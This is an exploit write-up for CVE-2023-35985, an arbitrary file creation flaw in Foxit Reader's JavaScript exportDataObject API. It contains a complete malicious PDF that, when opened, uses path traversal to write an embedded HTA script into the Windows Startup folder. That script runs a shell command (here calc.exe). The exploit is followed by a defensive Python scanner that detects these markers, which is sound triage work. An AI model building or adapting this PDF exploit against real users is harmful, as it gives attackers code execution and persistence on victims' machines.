Foxit Reader CVE-2023-35985 POC

By Prapattimynk

An arbitrary file creation vulnerability exists in the JavaScript exportDataObject API of Foxit Reader 12.1.3.15356 because the API fails to properly validate a dangerous file extension. A specially crafted malicious file can create files at arbitrary locations, which can lead to arbitrary code execution. To trigger the vulnerability, an attacker needs to trick the user into opening the malicious file. Exploitation is also possible when a user visits a specially crafted malicious site, provided the browser plugin extension is enabled.

%PDF 
1 0 obj
<</Pages 1 0 R /OpenAction 2 0 R>> 

2 0 obj
<</S/JavaScript/JS(
	function main() {
		console.show();
		this.exportDataObject({ cName:"MyData", nLaunch: 2});
	}
	main();
)/Type/Action>>
endobj

3 0 obj
<<
	/Length 6
	/Params
	<</ModDate(D:20230731134730-08'00')
	/Size 6
	/CheckSum<FA0903293EC8FC1F19087D0EB2FFDED8>
	/CreationDate(D:20230731133537-08'00')
>>
	/Subtype/application#2Fhta/Type/EmbeddedFile>>
stream
	<script language='jscript'>var cmd = 'cmd.exe /c calc.exe'; new ActiveXObject('WScript.Shell').Run(cmd);</script>
endstream
endobj
	
4 0 obj
<<
	/UF(..\/..\/..\/..\/..\/AppData\/Roaming\/Microsoft\/Windows\/Start Menu\/Programs\/Startup\/exploit.htm)/EF
	<</F 3 0 R>>/Desc()/F(exploit.hta)/Type/Filespec>>
endobj

5 0 obj
	<</EmbeddedFiles 6 0 R>>
endobj

6 0 obj
	<</Names[<FEFF004D00790044006100740061>4 0 R]>>
endobj
)>> trailer <</Root 1 0 R>>
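
For triage of inbound PDFs, the following added example (not part of the original post, and not Foxit's code) flags the markers this PoC relies on: a /UF or /F file name containing path traversal or a risky extension, an embedded file declared as application/hta, and a JavaScript exportDataObject call that sets nLaunch. It assumes uncompressed objects and literal-string file names; `scan_pdf`, `unescape`, `RISKY_EXT` and the sample bytes are names and data constructed for this illustration.

```python
import re

# A backslash in a PDF literal string escapes the next character ("\/" is "/").
# Simplification: \n, \t and octal escapes are not expanded, only unwrapped.
_ESCAPE = re.compile(rb"\\(.)", re.S)
# /F and /UF file names written as literal strings.
_FILENAME = re.compile(rb"/(UF|F)\s*\(((?:\\.|[^\\)])*)\)", re.S)
# PDF names may hide characters as #xx, e.g. application#2Fhta.
_HEXNAME = re.compile(rb"#([0-9A-Fa-f]{2})")
# Constructed short list of extensions Windows will execute or script (assumption).
RISKY_EXT = (".hta", ".htm", ".html", ".js", ".vbs", ".bat", ".cmd", ".exe", ".lnk")


def unescape(raw: bytes) -> str:
    return _ESCAPE.sub(rb"\1", raw).decode("latin-1")


def scan_pdf(data: bytes) -> list[str]:
    """Return human-readable findings for the markers described above."""
    findings = []
    for key, raw in _FILENAME.findall(data):
        name, label = unescape(raw), "/" + key.decode()
        if ".." in re.split(r"[\\/]", name) or re.match(r"[A-Za-z]:|[\\/]", name):
            findings.append(f"path traversal or absolute path in {label}: {name}")
        if name.lower().endswith(RISKY_EXT):
            findings.append(f"risky extension in {label}: {name}")
    decoded = _HEXNAME.sub(lambda m: bytes([int(m.group(1), 16)]), data)
    if re.search(rb"/Subtype\s*/application/hta", decoded, re.I):
        findings.append("embedded file declared as application/hta")
    if re.search(rb"exportDataObject\s*\([^)]*nLaunch\s*:\s*[12]", data):
        findings.append("JavaScript calls exportDataObject with nLaunch 1 or 2")
    return findings


# Constructed samples: SUSPICIOUS carries only the structural markers of the PoC
# above (no payload stream); BENIGN is an ordinary attachment entry.
SUSPICIOUS = rb"""
2 0 obj <</S/JavaScript/JS(this.exportDataObject({ cName:"MyData", nLaunch: 2});)>> endobj
3 0 obj <</Subtype/application#2Fhta/Type/EmbeddedFile/Length 0>> endobj
4 0 obj <</UF(..\/..\/Startup\/exploit.htm)/EF<</F 3 0 R>>/F(exploit.hta)/Type/Filespec>> endobj
"""
BENIGN = rb"4 0 obj <</UF(report.csv)/EF<</F 3 0 R>>/F(report.csv)/Type/Filespec>> endobj"

if __name__ == "__main__":
    for finding in scan_pdf(SUSPICIOUS):
        print(finding)
```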

